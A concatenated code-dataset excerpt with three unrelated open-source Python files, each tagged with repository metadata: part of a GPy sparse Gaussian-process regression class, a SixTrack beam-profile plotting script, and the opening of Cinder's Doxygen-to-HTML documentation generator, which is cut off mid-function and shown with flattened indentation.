def __init__(self, X, Y, indexD, kernel=None, Z=None, num_inducing=10, normalizer=None, mpi_comm=None, individual_Y_noise=False, name='sparse_gp'):
assert len(Y.shape)==1 or Y.shape[1]==1
self.individual_Y_noise = individual_Y_noise
self.indexD = indexD
output_dim = int(np.max(indexD))+1
num_data, input_dim = X.shape
        # kernel defaults to RBF (a white kernel could be added for numerical stability)
if kernel is None:
kernel = kern.RBF(input_dim)# + kern.white(input_dim, variance=1e-3)
# Z defaults to a subset of the data
if Z is None:
i = np.random.permutation(num_data)[:min(num_inducing, num_data)]
Z = X.view(np.ndarray)[i].copy()
else:
assert Z.shape[1] == input_dim
if individual_Y_noise:
likelihood = likelihoods.Gaussian(variance=np.array([np.var(Y[indexD==d]) for d in range(output_dim)])*0.01)
else:
likelihood = likelihoods.Gaussian(variance=np.var(Y)*0.01)
infr = VarDTC_MD()
super(SparseGPRegressionMD, self).__init__(X, Y, Z, kernel, likelihood, inference_method=infr, normalizer=normalizer, mpi_comm=mpi_comm, name=name)
self.output_dim = output_dim
def parameters_changed(self):
self.posterior, self._log_marginal_likelihood, self.grad_dict = self.inference_method.inference(self.kern, self.X, self.Z, self.likelihood, self.Y, self.indexD, self.output_dim, self.Y_metadata)
self.likelihood.update_gradients(self.grad_dict['dL_dthetaL'] if self.individual_Y_noise else self.grad_dict['dL_dthetaL'].sum())
self.kern.update_gradients_diag(self.grad_dict['dL_dKdiag'], self.X)
kerngrad = self.kern.gradient.copy()
self.kern.update_gradients_full(self.grad_dict['dL_dKnm'], self.X, self.Z)
kerngrad += self.kern.gradient
self.kern.update_gradients_full(self.grad_dict['dL_dKmm'], self.Z, None)
self.kern.gradient += kerngrad
        # gradients wrt Z
self.Z.gradient = self.kern.gradients_X(self.grad_dict['dL_dKmm'], self.Z)
self.Z.gradient += self.kern.gradients_X(self.grad_dict['dL_dKnm'].T, self.Z, self.X)
| SheffieldML/GPy | GPy/models/sparse_gp_regression_md.py | Python | bsd-3-clause | 4,136 | ["Gaussian"] | 480c15f1584a37a3387987019c9998ecc29a284280539d1080f5b41bad42bbd6 |
import math
from matplotlib import pyplot as plt
from matplotlib.colors import LogNorm
from matplotlib.ticker import LogLocator
from scipy.optimize import curve_fit
import numpy as np
iFilename = 'cry_entrance.dat'
# Reading file -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# the first line of the file is skipped as a header
partID, turn, collimator, mat, ishit, isabs, x, xp, y, yp, p = np.genfromtxt(iFilename, unpack=True, skip_header=1)
# Building histograms ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
binx = 200
biny = 200
binang = 200
f0 = plt.figure(0)
plt.suptitle('Beam profile @ crystal entrance')
plt.subplot(2,2,1)
plt.hist(x, bins=binx)
plt.title('x profile')
plt.xlabel('x [m]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,2)
plt.hist(y, bins=biny)
plt.title('y profile')
plt.xlabel('y [m]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,3)
plt.hist(xp, bins=binang)
plt.title('x\' profile')
plt.xlabel('x\' [rad]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
plt.subplot(2,2,4)
plt.hist(yp, bins=binang)
plt.title('y\' profile')
plt.xlabel('y\' [rad]')
plt.ylabel('# impacts')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.yscale('log')
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
f0.show()
f0.set_size_inches((13, 9), forward=False)
f0.tight_layout(rect=[0, 0.03, 1, 0.95])
f0.savefig('profiles1d_entrance.png')
f1 = plt.figure(1)
plt.hist2d(x, y, bins=[binx, biny], norm=LogNorm())
plt.title('2d profile @ crystal entrance')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f1.show()
f1.set_size_inches((9, 6), forward=False)
f1.tight_layout(rect=[0, 0.03, 1, 0.95])
f1.savefig('profile2d_entrance.png')
f2 = plt.figure(2)
plt.hist2d(x, xp, bins=[biny, binang], norm=LogNorm())
plt.title('x-x\' phase space @ crystal entrance')
plt.xlabel('x [m]')
plt.ylabel('x\' [rad]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f2.show()
f2.set_size_inches((9, 6), forward=False)
f2.tight_layout(rect=[0, 0.03, 1, 0.95])
f2.savefig('phasespacex_entrance.png')
f3 = plt.figure(3)
plt.hist2d(y, yp, bins=[biny, binang], norm=LogNorm())
plt.title('y-y\' phase space @ crystal entrance')
plt.xlabel('y [m]')
plt.ylabel('y\' [rad]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.grid(color='gray', linestyle='--', linewidth=0.5)
plt.colorbar(ticks = LogLocator(subs=range(10)))
f3.show()
f3.set_size_inches((9, 6), forward=False)
f3.tight_layout(rect=[0, 0.03, 1, 0.95])
f3.savefig('phasespacey_entrance.png')
input()
plt.close('all')
| SixTrack/SixTrack | test/collimation_cry_si_vr_ver_b2/EntCheck.py | Python | lgpl-2.1 | 3,261 | ["CRYSTAL"] | e9d254b4faa336af8ef26831032325a614876d8205dd6f064aa771813427bd18 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2015, The Cinder Project, All rights reserved.
This code is intended for use with the Cinder C++ library: http://libcinder.org
Redistribution and use in source and binary forms, with or without modification, are permitted provided that
the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and
the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and
the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
AUTHOR: Greg Kepler | gkepler@gmail.com
"""
import sys
import codecs
import re
import xml.etree.ElementTree as ET
import json
import os
import shutil
import stat
import argparse
import posixpath
from datetime import datetime
from difflib import SequenceMatcher as SM
from posixpath import join as urljoin
# Third party in libs folder
sys.path.append("libs/")
from bs4 import BeautifulSoup, Tag, NavigableString, Comment
from pystache.renderer import Renderer, Loader
# static path vars
BASE_PATH = os.path.dirname(os.path.realpath(__file__)) + os.sep
HTML_ROOT_DIR = 'html'
XML_SOURCE_PATH = BASE_PATH + 'xml' + os.sep
HTML_DEST_PATH = BASE_PATH + HTML_ROOT_DIR + os.sep
HTML_SOURCE_PATH = BASE_PATH + 'htmlsrc' + os.sep
TEMPLATE_PATH = BASE_PATH + 'htmlsrc' + os.sep + "_templates" + os.sep
PARENT_DIR = BASE_PATH.split(os.sep + 'docs')[0]
TAG_FILE_PATH = "doxygen" + os.sep + "cinder.tag"
# TODO: These should be dynamic via doxygen-generated data, perhaps from _cinder_8h.xml
file_meta = {
"cinder_version": "",
"doxy_version": "",
"creation_date": str(datetime.today().date()),
"docs_root": ""
}
parser = argparse.ArgumentParser(description='CiDocs')
parser.add_argument('path', nargs='?')
parser.add_argument('outpath', nargs='?')
parser.add_argument('-d', '--debug',
action='store_true',
help='show debug arguments')
parser.add_argument('-s', '--skiphtml',
action='store_true',
help='skip html generation')
parser.add_argument('--root',
default=HTML_ROOT_DIR,
help='server html root directory name')
parser.add_argument('--include-analytics',
action='store_true',
help='whether to include analytics in the frontend')
# various config settings
class Config(object):
def __init__(self):
# break on errors that would prevent the file from being generated
self.BREAK_ON_STOP_ERRORS = True
# whitelisted namespaces to generate pages for
self.NAMESPACE_WHITELIST = [
{
"name": "cinder"
},
{
"name": "glm",
"structure_whitelist":
[
{
"name": "typedefs",
"prefix_blacklist": ["lowp", "mediump", "highp"]
}
]
}
]
# blacklisted namespaces that will be skipped when generating pages
self.NAMESPACE_BLACKLIST = ["cinder::signals::detail", "cinder::audio::dsp::ooura", "cinder::detail", "glm::detail", "glm::gtc", "glm::gtx", "glm::io"]
# blacklisted class strings - any class containing these strings will be skipped
self.CLASS_LIST_BLACKLIST = ["glm", "@"]
# cinder github repo path
self.GITHUB_PATH = "http://github.com/cinder/Cinder/tree/master"
# file that contains cinder meta data
self.PROJECT_META_FILE = os.path.join(XML_SOURCE_PATH, "_cinder_8h.xml")
# path to the class template mustache file
self.CLASS_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-class-template.mustache")
# path to the namespace template mustache file
self.NAMESPACE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-namespace-template.mustache")
# path to the group template mustache file
self.GROUP_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-group-template.mustache")
# default html template mustache file
self.HTML_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-default-template.mustache")
# guide html template mustache file
self.GUIDE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-guide-template.mustache")
# reference html template mustache file
self.REFERENCE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-reference-template.mustache")
# home page template mustache file
self.HOME_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-home-template.mustache")
# file prefixes that indicate that the file should be parsed with the class template
self.CLASS_FILE_PREFIXES = ["class", "struct", "interface"]
# file prefixes that indicate that the file should be parsed with the namespace template
self.NAMESPACE_FILE_PREFIXES = ["namespace"]
# file prefixes that indicate that the file should be parsed with the group template
self.GROUP_FILE_PREFIXES = ["group"]
# configuration properties for different kinds of pages whose content is mostly dynamic from cinder.tag file
self.DYNAMIC_PAGES_CONFIG = [
# namespace list page
{
"id": "namespaces",
"reference_html": "namespaces.html",
"element_id": "namespace-content",
"template": "namespace-list.mustache",
"section": "namespaces",
"searchable": False
},
# class list page
{
"id": "classes",
"reference_html": "classes.html",
"element_id": "classes-content",
"template": "class-list.mustache",
"section": "classes",
"searchable": False
},
# glm reference page
{
"id": "glm",
"reference_html": "reference/glm.html",
"element_id": "glm-reference",
"template": "glm-reference.mustache",
"section": "reference",
"searchable": True
}
]
# config for parsing glm group. In the future, we will standardize and externalize this so that we can
# include and document additional modules
self.GLM_MODULE_CONFIG = {
"namespace": "glm",
"url_prefix": "https://github.com/g-truc/glm/tree/0.9.6.3/",
"group_keys": ["glm", "gtc", "gtx", "group__core"],
"source_file_ext": "hpp"
}
def is_namespace_whitelisted(self, ns_str):
if any(ns_str.startswith(entry["name"]) for entry in self.NAMESPACE_WHITELIST):
return True
return False
def is_namespace_blacklisted(self, ns_str):
if any([ns_str.startswith(prefix) for prefix in self.NAMESPACE_BLACKLIST]):
return True
return False
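# Illustrative behavior of the two namespace checks above (example values,
# not part of the original script), given the default whitelist/blacklist:
#   config.is_namespace_whitelisted("cinder::gl")      # -> True (prefix "cinder")
#   config.is_namespace_blacklisted("cinder::detail")  # -> True
#   config.is_namespace_whitelisted("boost")           # -> False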
def get_ns_config(self, ns_str):
for ns in self.NAMESPACE_WHITELIST:
if ns["name"] == ns_str:
return ns
return None
def get_section_config(self, sections, section_name):
if sections:
for section in sections:
if section["name"] == section_name:
return section
return None
def is_section_whitelisted(self, sections, section_name):
'''
Is the section of the page whitelisted?
:param sections: list of page section configs
:param section_name: name to check against
:return: True if the section is whitelisted, or if there is no whitelist at all
'''
if sections:
whitelisted = False
for section in sections:
if section["name"] == section_name:
whitelisted = True
break
else:
whitelisted = True
return whitelisted
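# Example (hypothetical section configs, for illustration only):
#   sections = [{"name": "typedefs", "prefix_blacklist": ["lowp"]}]
#   config.is_section_whitelisted(sections, "typedefs")  # -> True
#   config.is_section_whitelisted(sections, "classes")   # -> False
#   config.is_section_whitelisted(None, "classes")       # -> True (no whitelist given)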
# various state vars
class State(object):
def __init__(self):
self.html_files = []
self.processed_html_files = False
def add_html_file(self, file):
self.html_files.append(file)
# convert doxygen markup to html markup
tagDictionary = {
"linebreak": "br",
"emphasis": "em",
"ref": "a",
"ulink": "ulink",
"computeroutput": "code",
"includes": "span",
"simplesect": "span",
"para": "p"
}
# globals
g_tag_xml = None
g_symbolMap = None
g_search_index = None
config = Config()
state = State()
# =========================================================================================================== SYMBOL MAP
# mapping for the tag file with helper functions
class SymbolMap(object):
def __init__(self):
self.namespaces = {}
self.classes = {}
self.typedefs = {}
self.functions = {}
self.files = {}
self.enums = {}
self.groups = {}
class Class(object):
def __init__(self, class_tree):
# name with namespace
self.qualifiedName = class_tree.find('name').text
# name without namespace
self.name = strip_compound_name(self.qualifiedName)
self.path = class_tree.find('filename').text
self.base = class_tree.find('base').text if class_tree.find('base') is not None else ""
self.is_template = True if class_tree.find('templarg') is not None else False
self.functionList = []
self.relatedLinks = []
self.type_defs = []
# Path to the description prefix
self.prefix_content = None
# list of tags to be added to the search index
self.tags = []
self.tags.append(self.name)
def add_related_link(self, link_data):
# check for dupes
if not any(link.link == link_data.link for link in self.relatedLinks):
self.relatedLinks.append(link_data)
def define_prefix(self, content):
self.prefix_content = content
def add_type_def(self, type_def_obj):
self.type_defs.append(type_def_obj)
# add typedef string to search tags
self.tags.append(strip_compound_name(type_def_obj.name))
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
# add as a tag if not a duplicated name
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
class Namespace(object):
def __init__(self, name, file_name):
self.name = name
self.path = file_name
self.functionList = []
self.tags = []
self.tags.append(self.name)
self.typedefs = []
# add all namespace parts to search tags
for part in self.name.split("::"):
self.tags.append(part)
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
# add as a tag if not a duplicate name
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
class Typedef(object):
def __init__(self, name, type_def, path):
self.name = name
self.type = type_def
self.path = path
self.sharedFrom = None
class Function(object):
def __init__(self, member_tree, base_class=None):
anchor = member_tree.find("anchor").text
self.name = member_tree.find("name").text
self.base = base_class
self.path = member_tree.find("anchorfile").text + "#" + anchor
self.args = parse_arg_list(member_tree.find("arglist").text)
class File(object):
def __init__(self, name, path, typedefs):
self.name = name
self.path = path
self.typedefs = typedefs
rel_path_arr = self.path.split(PARENT_DIR.replace("\\", "/"))
self.relPath = "".join(rel_path_arr)
class Enum(object):
def __init__(self, name, path):
self.name = name
self.path = path
class Group(object):
def __init__(self, tree):
self.name = tree.find('name').text
self.title = tree.find("title").text
self.path = HTML_SOURCE_PATH + tree.find('filename').text
self.src_path = (XML_SOURCE_PATH + tree.find('filename').text).replace(".html", ".xml")
self.description = self.extract_description()
self.functionList = []
self.subgroup_names = []
self.subgroups = []
self.tags = []
self.tags.append(strip_compound_name(self.name))
self.prefix_content = None
def extract_description(self):
xml_tree = parse_xml(self.src_path)
bs4 = BeautifulSoup()
# use brief description if it exists
description = markup_brief_description(bs4, xml_tree.find(r'compounddef'))
# if not, use detailed description
if not description:
description = markup_description(bs4, xml_tree.find(r'compounddef'))
# extract first sentence of description
if description and description.text:
first_sentence = description.text.split(". ")[0] + "."
new_text = bs4.new_string(first_sentence)
description.contents[0].replace_with(new_text)
else:
description = None
return str(description) if description else ""
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
def add_function(self, ns, fn_name, fn_obj):
self.functions[ns + "::" + fn_name] = fn_obj
# searches the symbolMap for a given symbol, prepending cinder:: if not found as-is
# returns a class
def find_class(self, name):
# replace leading ci:: with cinder:: instead
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.classes:
return self.classes[searchname]
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.classes:
return self.classes["cinder::" + searchname]
else:
# iterate through all of the classes with namespace "cinder::" and test against just class name
for className in self.classes:
# if className has "cinder::" and namespace depth > 1, test against name
if className.find("cinder") == 0 and len(className.split("::")) > 1:
testname = className.split("cinder::")[1].rsplit("::", 1)[-1]
if testname == searchname:
return self.classes[className]
# check to see if the name is a typedef that is a shared_ptr to another class
typedef = self.find_typedef(searchname)
if typedef is not None:
if typedef.sharedFrom is not None:
return typedef.sharedFrom
else:
return typedef
# log("typedef " + typedef.name + " was not shared from an existing class", 1)
# check to see if parent is a typedef
searchname_parts = searchname.split("::")
if len(searchname_parts) > 1:
parent_name = searchname_parts[-2]
typedef = self.find_typedef(parent_name)
# if parent is typedef and has a sharedFrom property, find_class against that name
if typedef and typedef.sharedFrom:
return self.find_class("::".join([typedef.sharedFrom.name, searchname_parts[-1]]))
return None
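# Sketch of the lookup chain (names are illustrative): find_class("ci::gl::TextureRef")
# first normalizes "ci::" to "cinder::", tries the class map directly and with a
# "cinder::" prefix, then falls back to matching the bare class name, and finally
# resolves shared_ptr typedefs back to the class they are shared from.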
def find_namespace(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.namespaces.keys():
return self.namespaces.get(searchname)
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.namespaces.keys():
return self.namespaces["cinder::" + searchname]
return None
def find_group(self, name):
return self.groups.get(name)
def get_ordered_namespaces(self):
"""
create an array of strings that include all of the namespaces and return
:return: A list of namespace objects in alphabetical order
"""
namespaces = []
for nsKey in self.namespaces:
ns = self.namespaces[nsKey]
namespaces.append(ns)
# sort by lowercased name
namespaces = sorted(namespaces, key=lambda s: s.name.lower())
return namespaces
def get_whitelisted_namespaces(self):
"""
create a list of namespace objects that consist of only whitelisted namespaces
:return: An alphabetized list of namespace objects
"""
namespaces = []
for nsKey in self.namespaces:
ns = self.namespaces[nsKey]
# get whitelisted namespaces
whitelisted = False
if config.is_namespace_whitelisted(ns.name):
whitelisted = True
blacklisted = False
if config.is_namespace_blacklisted(ns.name):
blacklisted = True
if whitelisted and not blacklisted:
namespaces.append(ns)
# sort by lowercased name
namespaces = sorted(namespaces, key=lambda s: s.name.lower())
return namespaces
def find_typedef(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.typedefs.keys():
return self.typedefs[searchname]
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.typedefs:
return self.typedefs["cinder::" + searchname]
# key with "glm::" prepended
elif ("glm::" + searchname) in self.typedefs:
return self.typedefs["glm::" + searchname]
else:
# iterate through all of the typedefs with namespace "cinder::" and test against just the name
for typedef in self.typedefs:
if typedef.find("cinder") == 0 and len(typedef.split("::")) > 1:
testname = typedef.split("cinder::")[1].rsplit("::", 1)[-1]
if testname == searchname:
return self.typedefs[typedef]
return None
def find_function(self, name, argstring=""):
# find function name without namespace and parenthesis
fn_name = strip_compound_name(name.split('(')[0])
# find args and amt of args
args = parse_arg_list(str(argstring))
arg_len = len(args)
# non-optional arguments for the function
req_arg_len = 0
for arg in args:
if arg.find("=") < 0:
req_arg_len += 1
# find parent class first
class_parts = name.split("(")[0].split("::")
class_name = "::".join(class_parts[:-1])
ref_obj = g_symbolMap.find_class(class_name)
# if we can't find a matching function, try a namespace
if ref_obj is None:
ns_search = class_name
if class_name == "":
ns_search = "cinder"
ref_obj = g_symbolMap.find_namespace(ns_search)
# iterate through class/namespace functions
fn_list = []
if ref_obj:
for fn in ref_obj.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# try with cinder::app prefix
# TODO: refactor a bit with the ability to test different whitelisted namespaces
if len(fn_list) == 0:
ns_search = class_name
if class_name == "":
ns_search = "cinder::app"
ref_obj = g_symbolMap.find_namespace(ns_search)
# iterate through class/namespace functions
if ref_obj:
for fn in ref_obj.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# iterate through glm groups
if len(fn_list) == 0:
for group in self.groups:
group_ref = self.groups[group]
for fn in group_ref.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# else:
# for fn_key in self.functions:
# # print self.func
# # print self.functions[fn].name
# fn = self.functions[fn_key]
# if fn.name == fn_name:
# fn_list.append(fn)
# print "found match"
# print fn.args
# no functions found in class or namespaces, try search by name
if len(fn_list) == 0:
fn_obj = self.functions.get(fn_name)
if fn_obj is not None:
fn_list.append(fn_obj)
fn_index = 0
# if we have a bunch of options, we want to whittle it down to the best one
if len(fn_list) > 1:
best_score = 0
for idx, fn in enumerate(fn_list):
# fn_arg_len = len(fn.args)
score = 0
# find amount of required arguments
fn_arg_len = 0
for arg in fn.args:
if arg.find("=") < 0:
fn_arg_len += 1
# if number of passed in args is the same as this function's arg length, add to the score
if arg_len == fn_arg_len:
score += 0.5
# loop through the amount of args in this function
fn_args = fn.args[0:fn_arg_len]
if len(fn_args) > 0:
for i, arg in enumerate(fn_args):
if i + 1 > arg_len:
continue
ratio = (SM(None, arg, args[i]).ratio())
score += (ratio * 2.0)
if score > best_score:
fn_index = idx
best_score = score
found_function = fn_list[fn_index] if len(fn_list) > 0 else None
return found_function
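# Overload resolution sketch (hypothetical symbol): a call such as
#   g_symbolMap.find_function("ci::gl::Texture::bind", "( int unit )")
# strips the name to "bind", locates the parent class/namespace, then scores
# each candidate by required-argument count and SequenceMatcher similarity of
# the argument strings, returning the highest-scoring overload.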
def find_file(self, name):
return self.files.get(name)
def find_file_typedefs(self, name):
return self.find_file(name).typedefs
def find_enum(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# enum_obj = None
# if ns_obj is None:
# # find parent class first
# ns_parts = name.split("::")
# class_name = "::".join(ns_parts[:-1])
# class_obj = g_symbolMap.find_class(class_name)
# same key as name
if searchname in self.enums.keys():
return self.enums.get(searchname)
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.enums:
return self.enums.get("cinder::" + searchname)
def get_class_ancestors(self, name):
result = []
existingclass = self.find_class(name)
while existingclass and existingclass.base:
result.insert(0, existingclass)
existingclass = self.find_class(existingclass.base)
if result:
return result
else:
return []
def get_class_descendants(self, name):
result = []
for aClass in self.classes:
if self.classes[aClass].base == name:
result.append(self.classes[aClass])
if result:
return result
else:
return []
# def get_link_for_class(self, className):
# """ Get the link for the definition of a class.
# It may include namespace or not.
# """
# # strip down to the name of the class (without namespace)
# return ""
def get_ordered_class_list(self):
""" create an array of classes that include all of the classes and return
the array in alphabetical order """
classes = []
for class_key in self.classes:
class_obj = self.classes[class_key]
classes.append(class_obj)
# sort by lowercased name
return sorted(classes, key=lambda s: s.name.lower())
def find_classes_in_namespace(self, namespace, recursive=True):
ns_classes = []
for class_key in self.classes:
if recursive:
if class_key.startswith(namespace):
class_obj = self.find_class(class_key)
ns_classes.append(class_obj)
else:
class_pre = get_namespace(class_key)
if namespace == class_pre:
class_obj = self.find_class(class_key)
ns_classes.append(class_obj)
return ns_classes
# ====================================================================================================== FILE DATA TYPES
class FileData(object):
def __init__(self, tree):
self.tree = tree # xml file that describes the page
self.bs4 = None # html file of the actual page
self.name = ""
self.title = ""
self.page_header = ""
self.search_tags = []
self.path = ""
self.kind = ""
self.kind_explicit = ""
def get_content(self):
content = {
"name": self.name,
"title": self.title,
"page_header": self.page_header,
}
return content
class ClassFileData(FileData):
def __init__(self, tree):
FileData.__init__(self, tree)
self.description = None
self.is_template = False
self.template_def_name = ""
self.includes = None
self.typedefs = []
self.classes = []
self.related = []
self.namespace_nav = None
self.prefix = ""
self.enumerations = []
self.public_functions = []
self.public_types = []
self.public_static_functions = []
self.anchors = []
self.protected_functions = []
self.protected_attrs = []
self.class_hierarchy = None
self.friends = []
# fill compound name (with namespace if present)
self.compoundName = str(find_compound_name(tree))
self.stripped_name = strip_compound_name(self.compoundName)
# stripped name (w/o namespace)
name_parts = self.compoundName.rsplit("cinder::", 1)
if len(name_parts) > 1:
self.name = name_parts[1] # without "cinder::"
else:
self.name = name_parts[0]
# kind of file that we are parsing (class, namespace, etc)
self.kind = find_file_kind(tree)
self.kind_explicit = find_file_kind_explicit(tree)
self.namespace = "::".join(self.compoundName.split("::")[0:-1])
ns_list = self.compoundName.split("::")
ns_links = []
# make list of namespace links
for index, ns in enumerate(ns_list[:-1]):
ns_object = g_symbolMap.find_namespace("::".join(ns_list[0:index + 1]))
if ns_object:
ns_link = LinkData(path_join(HTML_DEST_PATH, ns_object.path), ns)
else:
# add inactive link data
ns_link = LinkData("", ns, False)
ns_links.append(ns_link)
self.ns_links = ns_links
def get_content(self):
orig_content = super(ClassFileData, self).get_content()
content = orig_content.copy()
class_content = {
"name": self.stripped_name,
"namespace": self.namespace,
"namespace_links": self.ns_links,
"description": self.description,
"is_template": self.is_template,
"template_def_name": self.template_def_name,
"side_nav_content": {
"include": self.includes,
"typedefs": {
"list": self.typedefs,
"length": len(self.typedefs)
},
"class_hierarchy": self.class_hierarchy,
"classes": {
"list": self.classes,
"length": len(self.classes)
},
"related": {
"list": self.related,
"length": len(self.related)
}
},
"namespace_nav": self.namespace_nav,
"prefix": self.prefix,
"enumerations": {
"anchor": "enumerations",
"list": self.enumerations,
"length": len(self.enumerations)
},
"public_functions": {
"anchor": "public-member-functions",
"list": self.public_functions,
"length": len(self.public_functions)
},
"public_static_functions": {
"anchor": "public-static-functions",
"list": self.public_static_functions,
"length": len(self.public_static_functions)
},
"protected_functions": {
"anchor": "protected-functions",
"list": self.protected_functions,
"length": len(self.protected_functions)
},
"protected_attrs": {
"anchor": "protected-attrs",
"list": self.protected_attrs,
"length": len(self.protected_attrs)
},
"public_types": {
"anchor": "public-types",
"list": self.public_types,
"length": len(self.public_types)
},
"friends": {
"anchor": "friends",
"list": self.friends,
"length": len(self.friends)
}
}
content.update(class_content)
return content
class NamespaceFileData(FileData):
def __init__(self, tree):
FileData.__init__(self, tree)
# stripped name (w/o namespace)
self.compoundName = str(find_compound_name(tree))
self.name = self.compoundName
self.namespaces = []
self.classes = []
self.typedefs = []
self.enumerations = []
self.functions = []
self.free_functions = []
self.variables = []
self.namespace_nav = None
self.kind = find_file_kind(tree)
self.kind_explicit = self.kind
def get_content(self):
orig_content = super(NamespaceFileData, self).get_content()
content = orig_content.copy()
ns_content = {
"namespace_nav": self.namespace_nav,
"namespaces": {
"anchor": "namespaces",
"list": self.namespaces,
"length": len(self.namespaces)
},
"classes": {
"anchor": "classes",
"list": self.classes,
"length": len(self.classes)
},
"typedefs": {
"anchor": "typedefs",
"list": self.typedefs,
"length": len(self.typedefs)
},
"enumerations": {
"anchor": "enumerations",
"list": self.enumerations,
"length": len(self.enumerations)
},
"public_functions": {
"anchor": "functions",
"list": self.functions,
"length": len(self.functions)
},
"free_functions": {
"anchor": "free_functions",
"list": self.free_functions,
"length": len(self.free_functions)
},
"variables": {
"anchor": "variables",
"list": self.variables,
"length": len(self.variables)
}
}
content.update(ns_content)
return content
class GroupFileData(FileData):
def __init__(self, tree, module_config):
FileData.__init__(self, tree)
self.description = ""
self.prefix = ""
self.typedefs = []
self.name = str(find_compound_name(tree))
self.public_functions = []
self.anchors = []
self.config = module_config
self.kind = "module"
self.kind_explicit = self.kind
def get_content(self):
orig_content = super(GroupFileData, self).get_content()
content = orig_content.copy()
group_content = {
"name": self.name,
"description": self.description,
"prefix": self.prefix,
"typedefs": {
"anchor": "typedefs",
"list": self.typedefs,
"length": len(self.typedefs)
},
"subgroups": {
"anchor": "subgroups",
"list": self.subgroups,
"length": len(self.subgroups)
},
# "enumerations": {
# "anchor": "enumerations",
# "list": self.enumerations,
# "length": len(self.enumerations)
# },
"public_functions": {
"anchor": "public-member-functions",
"list": self.public_functions,
"length": len(self.public_functions)
}
# "public_types": {
# "anchor": "public-types",
# "list": self.public_types,
# "length": len(self.public_types)
# }
}
content.update(group_content)
return content
class HtmlFileData(FileData):
def __init__(self, in_path):
FileData.__init__(self, None)
self.html_content = ""
self.group = None
self.pagenav = []
self.kind = "html"
self.kind_explicit = self.kind
if in_path.find("guides"+os.sep) > -1:
self.kind_explicit = "guide"
if in_path.find("reference"+os.sep) > -1:
self.kind_explicit = "reference"
def get_content(self):
orig_content = super(HtmlFileData, self).get_content()
content = dict(orig_content)
template_content = {
"html_content": self.html_content,
"namespace_nav": str(g_namespaceNav),
"pagenav": {
"list": self.pagenav,
"length": len(self.pagenav)
}
}
content.update(template_content)
return content
# ================================================================================================== Misc helper classes
class GuideConfig(object):
def __init__(self, config_json, path, file_name):
config_data = config_json["data"]
# parse subnav
subnav_list = []
self.order = None
if config_data["nav"]:
for index, nav in enumerate(config_data["nav"]):
subnav_obj = {}
link_data = LinkData(os.path.join(path, nav["link"]), nav["label"])
subnav = None
# find order of file in group
if re.match(file_name, nav["link"]):
self.order = index
# find subnav for the matched/current page if it has it
if nav.get("pagenav"):
subnav = self.parse_subnav(path, nav["pagenav"])
subnav_obj["link_data"] = link_data
subnav_obj["length"] = 0
if subnav:
subnav_obj["length"] = len(subnav)
subnav_obj["subnav"] = subnav
